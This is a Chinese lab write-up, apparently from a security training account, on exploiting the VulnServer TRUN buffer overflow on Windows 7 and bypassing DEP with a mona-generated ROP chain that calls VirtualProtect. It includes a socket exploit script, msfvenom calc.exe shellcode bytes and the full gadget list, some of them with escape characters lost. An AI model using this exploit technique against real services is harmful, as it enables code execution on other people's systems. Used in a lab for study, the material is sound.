1.项目名称
ROP 绕过数据执行保护(Bypass DEP)
2.实践目的
掌握操作系统开启 DEP 的情况下,如何基于 ROP 绕过 DEP 的防护,实现程序流程的劫持。
3.实践内容
实践靶机为开启了 DEP 的 WIN7,针对漏洞服务器 VulnServer 的 TRUN 命令,实现漏洞挖掘、分析和利用。
4.实践要求
1)掌握 DEP 开启的基本原理和方法;
2)掌握基于 ROP 绕过 DEP 的原理和方法
5.实践方法和步骤
靶机:win7
攻击机:kali linux
1)正常流程
1.1)触发异常
在靶机中先打开程序VulnServer
在kali中编写1.py,运行发送数据
shellcode = b""
shellcode += b"xbaxdbx42x12x7cxdbxc5xd9x74x24xf4"
shellcode += b"x58x2bxc9xb1x53x31x50x12x83xe8xfc"
shellcode += b"x03x8bx4cxf0x89xd7xb9x76x71x27x3a"
shellcode += b"x17xfbxc2x0bx17x9fx87x3cxa7xebxc5"
shellcode += b"xb0x4cxb9xfdx43x20x16xf2xe4x8fx40"
shellcode += b"x3dxf4xbcxb1x5cx76xbfxe5xbex47x70"
shellcode += b"xf8xbfx80x6dxf1xedx59xf9xa4x01xed"
shellcode += b"xb7x74xaaxbdx56xfdx4fx75x58x2cxde"
shellcode += b"x0dx03xeexe1xc2x3fxa7xf9x07x05x71"
shellcode += b"x72xf3xf1x80x52xcdxfax2fx9bxe1x08"
shellcode += b"x31xdcxc6xf2x44x14x35x8ex5exe3x47"
shellcode += b"x54xeaxf7xe0x1fx4cxd3x11xf3x0bx90"
shellcode += b"x1exb8x58xfex02x3fx8cx75x3exb4x33"
shellcode += b"x59xb6x8ex17x7dx92x55x39x24x7ex3b"
shellcode += b"x46x36x21xe4xe2x3dxccxf1x9ex1cx99"
shellcode += b"x36x93x9ex59x51xa4xedx6bxfex1ex79"
shellcode += b"xc0x77xb9x7ex27xa2x7dx10xd6x4dx7e"
shellcode += b"x39x1dx19x2ex51xb4x22xa5xa1x39xf7"
shellcode += b"x50xa9x9cxa8x46x54x5ex19xc7xf6x37"
shellcode += b"x73xc8x29x27x7cx02x42xc0x81xadx7d"
shellcode += b"x4dx0fx4bx17x7dx59xc3x8fxbfxbexdc"
shellcode += b"x28xbfx94x74xdex88xfex43xe1x08xd5"
shellcode += b"xe3x75x83x3ax30x64x94x16x10xf1x03"
shellcode += b"xecxf1xb0xb2xf1xdbx22x56x63x80xb2"
shellcode += b"x11x98x1fxe5x76x6ex56x63x6bxc9xc0"
shellcode += b"x91x76x8fx2bx11xadx6cxb5x98x20xc8"
shellcode += b"x91x8axfcxd1x9dxfex50x84x4bxa8x16"
shellcode += b"x7ex3ax02xc1x2dx94xc2x94x1dx27x94"
shellcode += b"x98x4bxd1x78x28x22xa4x87x85xa2x20"
shellcode += b"xf0xfbx52xcex2bxb8x63x85x71xe9xeb"
shellcode += b"x40xe0xabx71x73xdfxe8x8fxf0xd5x90"
shellcode += b"x6bxe8x9cx95x30xaex4dxe4x29x5bx71"
shellcode += b"x5bx49x4e"
import sys
buffer = "A" * 5000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.110.146',9999))
s.send('TRUN .:/ ' + buffer + 'rn')
s.recv(1024)
s.send('EXITrn')
s.close()
触发异常,此时EIP值为41414141
1.2)定位偏移量
msf-pattern_create -l 5000
利用kali生成5000个唯一字符串,然后修改代码
运行代码发送数据包
然后利用mona查找得到偏移量为2003
!mona findmsp
然后修改代码
buffer = "A"2003 + "BBBB" + "C"(5000-2003-4)
运行代码发送数据包,重新触发异常
EIP确实为42424242,所以偏移量为2003
1.3)排除坏字节
!mona ba -b "x00"
mona生成坏字符 badchar ,然后修改 buffer 的值 buffer = "A"2003 + "BBBB" + badchar + "C"(5000-2003-4-len(badchar))
重新运行代码发送数据包,触发异常
发现只有"x00"是坏字节
1.4)寻找jmp esp指令
利用mona生成
!mona jmp -r esp
任取一个,这里取0x625011bb
修改代码buffer="A"2003 + "xbbx11x50x62" + "C"(5000-2003-4)
在程序0x625011bb处下好断点,然后运行代码,发送数据,触发异常
跳转成功
1.5)写shellcode
msfvenom -p windows/exec CMD="calc.exe" -b "x00" -f python -v shellcode
msf生成弹计算器shellcode
修改buffer="A"2003 + "xbbx11x50x62" + "x90"16+shellcode+"C"*(5000-2003-4-len(shellcode))
2)在靶机中启动DEP
2.1)启动DEP
启动DEP命令:在cmd命令行管理员模式下执行bcdedit.exe/set {current} nx AlwaysOn pause 然后重启靶机
关闭DEP命令:bcdedit.exe/set {current} nx AlwaysOff pause 然后重启靶机
以上不行的话,可以在控制面板打开以下页面,启动
然后重启即可
启动之后运行程序,然后在kali运行代码,发现可以跳转到shellcode,但不能执行shellcode
2.2)生成ROP
利用mona生成
!mona rop 会生成文件 ropchain.txt,但是python代码部分第一条指令为00000000
!mona rop -m *.dll -n -cpb "x00" 使用该指令去掉00指令生成
defcreate_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x75a41a3a, # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR
0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll]
0x764e686a, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll] ** REBASED ** ASLR
0x764ef6c9, # XCHG EAX,ESI # RETN [RPCRT4.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ebp:---]
0x77bf8c9d, # POP EBP # RETN [ntdll.dll] ** REBASED ** ASLR
0x77732273, # & jmp esp [NSI.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ebx:---]
0x7684131e, # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR
0xfffffdff, # Value to negate, will become 0x00000201
0x7651b7d6, # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
0x76512015, # PUSH EAX # ADD AL,5E # POP EBX # RETN [RPCRT4.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_edx:---]
0x76841ee1, # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR
0xffffffc0, # Value to negate, will become 0x00000040
0x7649f3ea, # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
0x77b7f1c0, # XCHG EAX,EDX # RETN [ntdll.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_ecx:---]
0x75a93a04, # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR
0x62504739, # &Writable location [essfunc.dll]
#[---INFO:gadgets_to_set_edi:---]
0x764af22c, # POP EDI # RETN [RPCRT4.dll] ** REBASED ** ASLR
0x7649f3ec, # RETN (ROP NOP) [RPCRT4.dll] ** REBASED ** ASLR
#[---INFO:gadgets_to_set_eax:---]
0x764d0bb2, # POP EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR
0x90909090, # nop
#[---INFO:pushad:---]
0x764b8dce, # PUSHAD # RETN [RPCRT4.dll] ** REBASED ** ASLR
]
return''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
修改buffer="x41"2003 + rop_chain +"x90"16 +shellcode +"x43"*(5000-2003-len(rop_chain)-16- len(shellcode))
运行代码,弹出计算器
利用成功
DEP原理与机制参考:数据执行保护(DEP,Data Execution Prevention) 是一种安全机制,旨在防止恶意代码在计算机的特定内存区域执行。它通过标记某些内存区域为“不可执行”,从而阻止攻击者在这些区域注入并执行恶意代码。 - suv789 - 博客园
rop利用原理参考:基本 ROP - CTF Wiki
原文始发于微信公众号(泷羽Sec-Cicdl):ROP 绕过数据执行保护(Bypass DEP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论